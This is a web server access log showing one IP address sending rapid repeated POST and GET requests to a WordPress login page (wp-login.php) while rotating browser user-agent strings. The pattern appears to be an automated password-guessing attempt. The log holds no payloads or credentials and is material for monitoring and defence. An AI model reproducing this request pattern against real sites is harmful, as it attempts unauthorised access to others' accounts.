163.172.32.197 - - [29/Oct/2025:21:25:42 +0800] "GET /wp-login.php HTTP/1.1" 200 2779 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.5; rv:90.0) Gecko/20100101 Firefox/90.0"
163.172.32.197 - - [29/Oct/2025:21:25:42 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15"
163.172.32.197 - - [29/Oct/2025:21:25:42 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.59"
163.172.32.197 - - [29/Oct/2025:21:25:42 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.59"
163.172.32.197 - - [29/Oct/2025:21:25:42 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com/wp-login.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
163.172.32.197 - - [29/Oct/2025:21:25:42 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0"
163.172.32.197 - - [29/Oct/2025:21:25:43 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15"
163.172.32.197 - - [29/Oct/2025:21:25:43 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
163.172.32.197 - - [29/Oct/2025:21:25:43 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com/wp-login.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
163.172.32.197 - - [29/Oct/2025:21:25:45 +0800] "GET /wp-login.php HTTP/1.1" 200 2779 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.5; rv:90.0) Gecko/20100101 Firefox/90.0"
163.172.32.197 - - [29/Oct/2025:21:25:45 +0800] "GET /wp-login.php HTTP/1.1" 200 2779 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15"
163.172.32.197 - - [29/Oct/2025:21:25:45 +0800] "GET /wp-login.php HTTP/1.1" 200 2779 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.5; rv:90.0) Gecko/20100101 Firefox/90.0"
163.172.32.197 - - [29/Oct/2025:21:25:45 +0800] "GET /wp-login.php HTTP/1.1" 200 2779 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.59"
163.172.32.197 - - [29/Oct/2025:21:25:45 +0800] "GET /wp-login.php HTTP/1.1" 200 2779 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15"
163.172.32.197 - - [29/Oct/2025:21:25:45 +0800] "GET /wp-login.php HTTP/1.1" 200 2779 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.5; rv:90.0) Gecko/20100101 Firefox/90.0"
